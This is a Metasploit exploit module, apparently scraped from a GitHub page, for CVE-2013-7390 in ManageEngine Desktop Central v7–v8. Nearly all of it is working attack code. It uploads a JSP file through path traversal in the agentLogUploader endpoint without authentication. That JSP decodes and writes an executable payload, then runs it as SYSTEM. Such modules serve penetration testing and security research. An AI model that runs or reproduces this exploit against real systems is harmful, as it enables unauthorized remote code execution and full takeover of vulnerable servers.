Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
v8 build 80293. A malicious user can upload a JSP file into the web root without
authentication, leading to arbitrary code execution as SYSTEM.
},
'Author' =>
[
'Thomas Hibbert <thomas.hibbert[at]security-assessment.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-7390'],
['OSVDB', '100008'],
['URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf'],
['URL', 'https://seclists.org/fulldisclosure/2013/Nov/130'],
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => '2013-11-11'
))
register_options([Opt::RPORT(8020)])
end
def upload_file(filename, contents)
res = send_request_cgi({
'uri' => normalize_uri('agentLogUploader'),
'method' => 'POST',
'data' => contents,
'ctype' => 'text/html',
'encode_params' => false,
'vars_get' => {
'computerName' => 'DesktopCentral',
'domainName' => 'webapps',
'customerId' => '..',
'filename' => filename
}
})
if res && res.code == 200 && res.body.to_s.empty?
return true
else
return false
end
end
# Test for Desktop Central
def check
res = send_request_cgi({
'uri' => normalize_uri("configurations.do"),
'method' => 'GET'
})
if res && res.code == 200
build = nil
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
print_status("Detected Desktop Central v7")
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
build = $1
print_status("Detected Desktop Central v8 #{build}")
else # DC v8 (earlier versions)
print_status("Detected Desktop Central v8")
end
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
build = $1
end
if build.nil?
return Exploit::CheckCode::Unknown
elsif Rex::Version.new(build) < Rex::Version.new("80293")
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
dropper = jsp_drop_and_execute(exe, exe_filename)
dropper_filename = rand_text_alpha_lower(8) + ".jsp"
if upload_file(dropper_filename, dropper)
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{dropper_filename}")
else
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(dropper_filename),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end